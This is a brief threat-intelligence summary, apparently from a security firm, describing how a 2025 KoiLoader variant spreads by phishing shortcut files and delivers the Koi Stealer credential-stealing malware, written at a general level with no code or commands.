eSentire’s Threat Response Unit (TRU) has uncovered a sophisticated intrusion attempt involving a new variant of KoiLoader malware, which delivers Koi Stealer through a multi-stage attack. The intrusion starts with a phishing email containing a malicious .lnk file disguised as a document. Upon execution, PowerShell commands are triggered to download malicious JScript files that establish persistence, evade detection, and initiate payload delivery. The malware utilizes anti-analysis techniques to avoid detection, including checking for specific languages, VM artifacts, and sandbox environments.

The final payload, KoiStealer, is designed to exfiltrate sensitive data such as passwords, system credentials, cookies, and browser data. The malware leverages a custom C2 protocol with encrypted communication to execute commands, download payloads, and perform system manipulations. This 2025 variant demonstrates advanced evasion techniques, including UAC bypasses and persistence mechanisms.

eSentire has provided a Python-based emulation toolkit for researchers to study the malware’s behavior.

‍